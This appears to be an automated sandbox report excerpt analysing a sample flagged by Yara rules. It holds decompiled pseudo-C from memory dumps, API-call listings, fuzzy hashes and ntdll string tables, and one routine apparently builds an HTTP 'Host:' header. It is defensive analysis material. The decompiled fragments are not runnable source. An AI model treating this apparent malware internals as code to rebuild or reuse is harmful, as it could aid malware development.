                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00A8A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                            					}
                            					return _t14;
                            				}
                            				return _t13;
                            			}













                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00A8836A
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                            • Instruction ID: 81bf291b3d5cacc62dd9b0aab8687c4743d04851b3d21d8b1c64ae9be0f38c5e
                            • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                            • Instruction Fuzzy Hash: 5C018471A8022877EB20B6949D03FFE776CAB40F50F040115FF04BA1C2EA98690647F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 234 a8acd4-a8acd5 235 a8ad40-a8ad54 LdrLoadDll 234->235 236 a8acd7-a8acfc 234->236 239 a8ad57-a8ad5a 235->239 237 a8ad04-a8ad09 236->237 238 a8acff call a9cc40 236->238 240 a8ad0b-a8ad0e 237->240 241 a8ad0f-a8ad1d call a9d060 237->241 238->237 244 a8ad2d-a8ad3e call a9b490 241->244 245 a8ad1f-a8ad2a call a9d2e0 241->245 244->235 244->239 245->244
                            C-Code - Quality: 89%
                            			E00A8ACD4(void* __eax, void* __ecx, void* __eflags) {
                            				struct _OBJDIR_INFORMATION _t20;
                            				void* _t23;
                            				struct _OBJDIR_INFORMATION _t25;
                            
                            				if(__eflags >= 0) {
                            					L7:
                            					LdrLoadDll(0, 0, 0xffffffffa430df78, 0xffffffffa430df74); // executed
                            					_t20 =  *0xFFFFFFFFA430DF74;
                            					goto L8;
                            				} else {
                            					asm("daa");
                            					_push(0xa430df80);
                            					_t30 =  *0xFFFFFFFFA430DF8C;
                            					 *0xFFFFFFFFA430DF7C = 0xffffffffa430dd6c;
                            					_t23 = E00A9CC40(0xffffffffa430df78, 0x104,  *0xFFFFFFFFA430DF8C);
                            					if(_t23 != 0) {
                            						_t25 = E00A9D060( *((intOrPtr*)(0xffffffffa430df7c)), _t30, __eflags,  *((intOrPtr*)(0xffffffffa430df7c)));
                            						__eflags = _t25;
                            						if(_t25 != 0) {
                            							E00A9D2E0(0xffffffffa430df78, 0);
                            						}
                            						_t20 = E00A9B490( *((intOrPtr*)(0xffffffffa430df7c)));
                            						 *0xFFFFFFFFA430DF74 = _t20;
                            						__eflags = _t20;
                            						if(_t20 == 0) {
                            							goto L7;
                            						}
                            						L8:
                            						return _t20;
                            					} else {
                            						return _t23;
                            					}
                            				}
                            			}







                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A8AD52
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
                            • Instruction ID: 5c90b192790342b49d84f440b2a7eed1c2e5265388f32cb74225994fd33cdd4d
                            • Opcode Fuzzy Hash: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
                            • Instruction Fuzzy Hash: BEF05475E5010DABEF00DA94D842FDDB7F59B54309F0082D5ED1CDB640F5719A588751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 253 a9a620-a9a651 call a9af50 RtlAllocateHeap
                            C-Code - Quality: 100%
                            			E00A9A620(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                            				void* _t10;
                            				void* _t15;
                            
                            				E00A9AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                            				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlAllocateHeap.NTDLL(00A94526,?,00A94C9F,00A94C9F,?,00A94526,?,?,?,?,?,00000000,00A89CE3,?), ref: 00A9A64D
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 0f60b9beae202daff58441045d03e48b72880b312970e36183f93b7e3fcaa272
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 59E012B6200208ABDB14EF99CC41EA777ACAF88754F118559BA1C5B242C630F9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 256 a9a660-a9a691 call a9af50 RtlFreeHeap
                            C-Code - Quality: 100%
                            			E00A9A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                            				char _t10;
                            				void* _t15;
                            
                            				_t3 = _a4 + 0xc74; // 0xc74
                            				E00A9AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00A89CE3,?,?,00A89CE3,00000060,00000000,00000000,?,?,00A89CE3,?,00000000), ref: 00A9A68D
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: e1028d42af1cd2f42196b2ae0c0412a1efdf17147569a9862ec05e5882e703e1
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: C5E012B6200208ABDB18EF99CC49EA777ACAF88750F018559BA1C5B242C630E9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 259 a9a7c0-a9a7f4 call a9af50 LookupPrivilegeValueW
                            C-Code - Quality: 100%
                            			E00A9A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                            				int _t10;
                            				void* _t15;
                            
                            				E00A9AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00A8F1C2,00A8F1C2,0000003C,00000000,?,00A89D55), ref: 00A9A7F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: 4645ac546a2e5ae069986b041bbe8dc9accd612db9ec172cf48c409fb78e5a27
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 99E01AB52002086BDB10DF49CC85EE737ADAF89750F018155BA0C57241C930E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 268 a9a6a0-a9a6cc call a9af50 ExitProcess
                            C-Code - Quality: 100%
                            			E00A9A6A0(intOrPtr _a4, int _a8) {
                            				void* _t10;
                            
                            				_t5 = _a4;
                            				E00A9AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                            				ExitProcess(_a8);
                            			}

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00A9A6C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 9f23230150b95f0a74d0e8b88c8038fdc43dfa9d1d1c015c049d1143357f84b1
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: 7AD017766002187BDA20EB98CC85FE777ACDF497A0F0180A5BA1C6B242C531BA008AE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: bd99a5c2e51183ddb1586fd6c3ad0d2cc20fb54e66e944d2a64b31987f2ec5d3
                            • Instruction ID: 3d812c6418611648d39c06edc3f8dd7db4b25b3db32223c1c6e77b2f7a013789
                            • Opcode Fuzzy Hash: bd99a5c2e51183ddb1586fd6c3ad0d2cc20fb54e66e944d2a64b31987f2ec5d3
                            • Instruction Fuzzy Hash: 23B09B719054C5C9E751D7A54608717F944B7D4745F16C061D6420641F4778C095F5B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017CB476
                            • The instruction at %p referenced memory at %p., xrefs: 017CB432
                            • Go determine why that thread has not released the critical section., xrefs: 017CB3C5
                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017CB39B
                            • This failed because of error %Ix., xrefs: 017CB446
                            • The instruction at %p tried to %s , xrefs: 017CB4B6
                            • *** enter .exr %p for the exception record, xrefs: 017CB4F1
                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017CB323
                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017CB53F
                            • a NULL pointer, xrefs: 017CB4E0
                            • an invalid address, %p, xrefs: 017CB4CF
                            • The critical section is owned by thread %p., xrefs: 017CB3B9
                            • *** enter .cxr %p for the context, xrefs: 017CB50D
                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017CB305
                            • The resource is owned shared by %d threads, xrefs: 017CB37E
                            • write to, xrefs: 017CB4A6
                            • *** then kb to get the faulting stack, xrefs: 017CB51C
                            • *** An Access Violation occurred in %ws:%s, xrefs: 017CB48F
                            • read from, xrefs: 017CB4AD, 017CB4B2
                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017CB47D
                            • The resource is owned exclusively by thread %p, xrefs: 017CB374
                            • *** Inpage error in %ws:%s, xrefs: 017CB418
                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017CB38F
                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017CB314
                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017CB2DC
                            • <unknown>, xrefs: 017CB27E, 017CB2D1, 017CB350, 017CB399, 017CB417, 017CB48E
                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017CB2F3
                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017CB3D6
                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017CB484
                            • *** Resource timeout (%p) in %ws:%s, xrefs: 017CB352
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                            • API String ID: 0-108210295
                            • Opcode ID: 7eed1adbf3954d3ba886fb8d0c4845406c7a0e43233bda50efc658b91673fa67
                            • Instruction ID: 91668504391a10b0ae959f4af06d06917b40db6e8ddd26fb13546ecc571fe58f
                            • Opcode Fuzzy Hash: 7eed1adbf3954d3ba886fb8d0c4845406c7a0e43233bda50efc658b91673fa67
                            • Instruction Fuzzy Hash: 7C81E2B5A00310FFDB266B8ACC5AD7FFF66EF96B91B40408CF5042B156E2618951C672
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00A96CDD(intOrPtr* __eax, void* __eflags) {
                            				void* _t40;
                            				void* _t41;
                            				void* _t52;
                            				void* _t55;
                            				void* _t58;
                            				void* _t59;
                            				void* _t62;
                            
                            				asm("a16 push esp");
                            				asm("scasd");
                            				if(__eflags >= 0) {
                            					_t41 = _t40 + __eax;
                            					_t59 = _t58 + 1;
                            					0x6f14db70();
                            					 *((intOrPtr*)(_t59 - 0x14)) = 0x6e776f;
                            					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xcb8))))( *__eax());
                            					__eflags = _t55;
                            					if(_t55 != 0) {
                            						__eflags = _t55 - 0x40;
                            						if(_t55 > 0x40) {
                            							 *((char*)(_t41 + 0xda7)) = 0;
                            							_t55 = 0x40;
                            						}
                            					} else {
                            						_t3 = _t59 - 0x18; // 0x6e6b6e55
                            						E00A9BDD0(_t41 + 0xd68, _t3, 8);
                            						_t62 = _t62 + 0xc;
                            						_t55 = 7;
                            					}
                            					 *((intOrPtr*)(_t59 - 8)) = 0xa0d0a0d;
                            					 *((char*)(_t59 - 4)) = 0;
                            					 *((intOrPtr*)(_t59 - 0x10)) = 0x74736f48;
                            					 *((short*)(_t59 - 0xc)) = 0x203a;
                            					 *((char*)(_t59 - 0xa)) = 0;
                            					E00A9BDD0(_t52, _t59 - 0x10, 7);
                            					E00A9BDD0(_t52 + 6, _t41 + 0xd68, _t55);
                            					_t14 = _t59 - 8; // 0xa0d0a0d
                            					 *((char*)(_t55 + _t52 + 6)) = 0;
                            					E00A9C1D0(_t52, _t14, 5);
                            					_t17 = _t59 + 0x10; // 0x74736f48
                            					_t18 = _t59 + 0xc; // 0x203a
                            					_t20 = _t52 + 0xa; // 0x11
                            					E00A9BDD0(_t55 + _t20,  *_t18,  *_t17);
                            					_t22 = _t59 + 0x10; // 0x74736f48
                            					_t47 =  *_t22;
                            					_push( *((intOrPtr*)(_t41 + 0x1160)));
                            					_push(2);
                            					_t24 = _t47 + 0xa; // 0x11
                            					_push(_t55 + _t24);
                            					_push(_t52);
                            					_push(_t41);
                            					L00A963E0( *_t22, _t55 + _t24);
                            					return 1;
                            				} else {
                            					return __eax;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $: $: $Host$Host: $Unknown
                            • API String ID: 0-3527920956
                            • Opcode ID: ad8ed4a618d958df6adef819aefc5dc5dea006b374e12be4555140abdbf665dd
                            • Instruction ID: 5140540794cbd2086a94f669d239ad54a7e53cba0ef6de904d1ed42398c3a434
                            • Opcode Fuzzy Hash: ad8ed4a618d958df6adef819aefc5dc5dea006b374e12be4555140abdbf665dd
                            • Instruction Fuzzy Hash: 4821AF76A00208AADB11DB94DC81BEFB3A8AFC4700F048659F9199B245C775A604C7F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E01723D34(signed int* __ecx) {
                            				signed int* _v8;
                            				char _v12;
                            				signed int* _v16;
                            				signed int* _v20;
                            				char _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int* _v48;
                            				signed int* _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				char _v68;
                            				signed int _t140;
                            				signed int _t161;
                            				signed int* _t236;
                            				signed int* _t242;
                            				signed int* _t243;
                            				signed int* _t244;
                            				signed int* _t245;
                            				signed int _t255;
                            				void* _t257;
                            				signed int _t260;
                            				void* _t262;
                            				signed int _t264;
                            				void* _t267;
                            				signed int _t275;
                            				signed int* _t276;
                            				short* _t277;
                            				signed int* _t278;
                            				signed int* _t279;
                            				signed int* _t280;
                            				short* _t281;
                            				signed int* _t282;
                            				short* _t283;
                            				signed int* _t284;
                            				void* _t285;
                            
                            				_v60 = _v60 | 0xffffffff;
                            				_t280 = 0;
                            				_t242 = __ecx;
                            				_v52 = __ecx;
                            				_v8 = 0;
                            				_v20 = 0;
                            				_v40 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v44 = 0;
                            				_v56 = 0;
                            				_t275 = 0;
                            				_v16 = 0;
                            				if(__ecx == 0) {
                            					_t280 = 0xc000000d;
                            					_t140 = 0;
                            					L50:
                            					 *_t242 =  *_t242 | 0x00000800;
                            					_t242[0x13] = _t140;
                            					_t242[0x16] = _v40;
                            					_t242[0x18] = _v28;
                            					_t242[0x14] = _v32;
                            					_t242[0x17] = _t275;
                            					_t242[0x15] = _v44;
                            					_t242[0x11] = _v56;
                            					_t242[0x12] = _v60;
                            					return _t280;
                            				}
                            				if(E01721B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v56 = 1;
                            					if(_v8 != 0) {
                            						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                            					}
                            					_v8 = _t280;
                            				}
                            				if(E01721B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v60 =  *_v8;
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                            					_v8 = _t280;
                            				}
                            				if(E01721B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                            					L16:
                            					if(E01721B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                            						L28:
                            						if(E01721B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                            							L46:
                            							_t275 = _v16;
                            							L47:
                            							_t161 = 0;
                            							L48:
                            							if(_v8 != 0) {
                            								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                            							}
                            							_t140 = _v20;
                            							if(_t140 != 0) {
                            								if(_t275 != 0) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                            									_t275 = 0;
                            									_v28 = 0;
                            									_t140 = _v20;
                            								}
                            							}
                            							goto L50;
                            						}
                            						_t167 = _v12;
                            						_t255 = _v12 + 4;
                            						_v44 = _t255;
                            						if(_t255 == 0) {
                            							_t276 = _t280;
                            							_v32 = _t280;
                            						} else {
                            							_t276 = L01734620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                            							_t167 = _v12;
                            							_v32 = _t276;
                            						}
                            						if(_t276 == 0) {
                            							_v44 = _t280;
                            							_t280 = 0xc0000017;
                            							goto L46;
                            						} else {
                            							E0175F3E0(_t276, _v8, _t167);
                            							_v48 = _t276;
                            							_t277 = E01761370(_t276, 0x16f4e90);
                            							_pop(_t257);
                            							if(_t277 == 0) {
                            								L38:
                            								_t170 = _v48;
                            								if( *_v48 != 0) {
                            									E0175BB40(0,  &_v68, _t170);
                            									if(L017243C0( &_v68,  &_v24) != 0) {
                            										_t280 =  &(_t280[0]);
                            									}
                            								}
                            								if(_t280 == 0) {
                            									_t280 = 0;
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                            									_v44 = 0;
                            									_v32 = 0;
                            								} else {
                            									_t280 = 0;
                            								}
                            								_t174 = _v8;
                            								if(_v8 != 0) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                            								}
                            								_v8 = _t280;
                            								goto L46;
                            							}
                            							_t243 = _v48;
                            							do {
                            								 *_t277 = 0;
                            								_t278 = _t277 + 2;
                            								E0175BB40(_t257,  &_v68, _t243);
                            								if(L017243C0( &_v68,  &_v24) != 0) {
                            									_t280 =  &(_t280[0]);
                            								}
                            								_t243 = _t278;
                            								_t277 = E01761370(_t278, 0x16f4e90);
                            								_pop(_t257);
                            							} while (_t277 != 0);
                            							_v48 = _t243;
                            							_t242 = _v52;
                            							goto L38;
                            						}
                            					}
                            					_t191 = _v12;
                            					_t260 = _v12 + 4;
                            					_v28 = _t260;
                            					if(_t260 == 0) {
                            						_t275 = _t280;
                            						_v16 = _t280;
                            					} else {
                            						_t275 = L01734620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                            						_t191 = _v12;
                            						_v16 = _t275;
                            					}
                            					if(_t275 == 0) {
                            						_v28 = _t280;
                            						_t280 = 0xc0000017;
                            						goto L47;
                            					} else {
                            						E0175F3E0(_t275, _v8, _t191);
                            						_t285 = _t285 + 0xc;
                            						_v48 = _t275;
                            						_t279 = _t280;
                            						_t281 = E01761370(_v16, 0x16f4e90);
                            						_pop(_t262);
                            						if(_t281 != 0) {
                            							_t244 = _v48;
                            							do {
                            								 *_t281 = 0;
                            								_t282 = _t281 + 2;
                            								E0175BB40(_t262,  &_v68, _t244);
                            								if(L017243C0( &_v68,  &_v24) != 0) {
                            									_t279 =  &(_t279[0]);
                            								}
                            								_t244 = _t282;
                            								_t281 = E01761370(_t282, 0x16f4e90);
                            								_pop(_t262);
                            							} while (_t281 != 0);
                            							_v48 = _t244;
                            							_t242 = _v52;
                            						}
                            						_t201 = _v48;
                            						_t280 = 0;
                            						if( *_v48 != 0) {
                            							E0175BB40(_t262,  &_v68, _t201);
                            							if(L017243C0( &_v68,  &_v24) != 0) {
                            								_t279 =  &(_t279[0]);
                            							}
                            						}
                            						if(_t279 == 0) {
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                            							_v28 = _t280;
                            							_v16 = _t280;
                            						}
                            						_t202 = _v8;
                            						if(_v8 != 0) {
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                            						}
                            						_v8 = _t280;
                            						goto L28;
                            					}
                            				}
                            				_t214 = _v12;
                            				_t264 = _v12 + 4;
                            				_v40 = _t264;
                            				if(_t264 == 0) {
                            					_v20 = _t280;
                            				} else {
                            					_t236 = L01734620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                            					_t280 = _t236;
                            					_v20 = _t236;
                            					_t214 = _v12;
                            				}
                            				if(_t280 == 0) {
                            					_t161 = 0;
                            					_t280 = 0xc0000017;
                            					_v40 = 0;
                            					goto L48;
                            				} else {
                            					E0175F3E0(_t280, _v8, _t214);
                            					_t285 = _t285 + 0xc;
                            					_v48 = _t280;
                            					_t283 = E01761370(_t280, 0x16f4e90);
                            					_pop(_t267);
                            					if(_t283 != 0) {
                            						_t245 = _v48;
                            						do {
                            							 *_t283 = 0;
                            							_t284 = _t283 + 2;
                            							E0175BB40(_t267,  &_v68, _t245);
                            							if(L017243C0( &_v68,  &_v24) != 0) {
                            								_t275 = _t275 + 1;
                            							}
                            							_t245 = _t284;
                            							_t283 = E01761370(_t284, 0x16f4e90);
                            							_pop(_t267);
                            						} while (_t283 != 0);
                            						_v48 = _t245;
                            						_t242 = _v52;
                            					}
                            					_t224 = _v48;
                            					_t280 = 0;
                            					if( *_v48 != 0) {
                            						E0175BB40(_t267,  &_v68, _t224);
                            						if(L017243C0( &_v68,  &_v24) != 0) {
                            							_t275 = _t275 + 1;
                            						}
                            					}
                            					if(_t275 == 0) {
                            						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                            						_v40 = _t280;
                            						_v20 = _t280;
                            					}
                            					_t225 = _v8;
                            					if(_v8 != 0) {
                            						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                            					}
                            					_v8 = _t280;
                            					goto L16;
                            				}
                            			}











































                            Strings
                            • Kernel-MUI-Language-SKU, xrefs: 01723F70
                            • Kernel-MUI-Language-Allowed, xrefs: 01723DC0
                            • Kernel-MUI-Language-Disallowed, xrefs: 01723E97
                            • WindowsExcludedProcs, xrefs: 01723D6F
                            • Kernel-MUI-Number-Allowed, xrefs: 01723D8C
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: 6453d8cd1d5af1a213d5a1823e8ad9c0d9c4bc945ac7d347679fbfab909a0037
                            • Instruction ID: b1e955fef0aa3b4febfffcae58cedf964b626ffcbe21f02dd938d55f04e45655
